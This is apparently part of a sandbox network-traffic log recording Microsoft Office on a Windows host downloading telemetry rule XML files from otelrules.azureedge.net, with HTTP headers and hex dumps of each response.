                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                  ETag: "0x8DC582BE8C605FF"
                                                  x-ms-request-id: c904ac86-e01e-0003-2a22-2b0fa8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-15b8d89586f5s5nz3ffrgxn5ac0000000at0000000006snr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.45243513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:55 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:55 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:55 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF497570"
                                                  x-ms-request-id: 7f3b7c7e-d01e-0049-3ec5-2ae7dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195055Z-159b85dff8fbvrz4hC1DFW730c0000000170000000001tsx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:55 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.45243613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:55 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:55 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:55 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDC2EEE03"
                                                  x-ms-request-id: 19ae2231-801e-007b-0d9c-27e7ab000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195055Z-16849878b78zqkvcwgr6h55x9n00000009gg000000004mmz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:55 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.45243713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:55 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:55 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:55 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                  ETag: "0x8DC582BEA414B16"
                                                  x-ms-request-id: 9800c975-801e-008c-0e2c-267130000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195055Z-17c5cb586f672xmrz843mf85fn00000008zg0000000094w7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:55 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.45243813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:55 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:55 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:55 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                  ETag: "0x8DC582BE1CC18CD"
                                                  x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195055Z-16849878b78sx229w7g7at4nkg000000085g00000000rs4b
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:55 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.45243913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:55 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:55 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:55 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB256F43"
                                                  x-ms-request-id: 774e7d8d-d01e-007a-55ae-2af38c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195055Z-17c5cb586f62tvgppdugz3gsrn00000000tg00000000m1bb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:55 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.45244013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:56 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB866CDB"
                                                  x-ms-request-id: 6d58be1b-301e-0052-189d-2765d6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-17c5cb586f6zcqf8r7the4ske000000002e00000000008qd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:56 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.45244113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:56 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                  ETag: "0x8DC582BE5B7B174"
                                                  x-ms-request-id: c91dfad3-401e-0015-1dd2-2a0e8d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-159b85dff8fsgrl7hC1DFWadan00000002r000000000c52t
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:56 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.45244213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:56 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                  ETag: "0x8DC582BE976026E"
                                                  x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-16849878b78x44pv2mpb0dd37w00000001zg00000000xben
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:56 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.45244313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:56 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                  ETag: "0x8DC582BDC13EFEF"
                                                  x-ms-request-id: 4b09b00a-d01e-0028-11e9-297896000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-159b85dff8fc5h75hC1DFWntr800000001gg00000000a6pm
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:56 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.45244413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:56 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1425
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                  ETag: "0x8DC582BE6BD89A1"
                                                  x-ms-request-id: 9a40e34d-b01e-005c-559c-274c66000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-16849878b78xblwksrnkakc08w00000009a0000000004w5a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
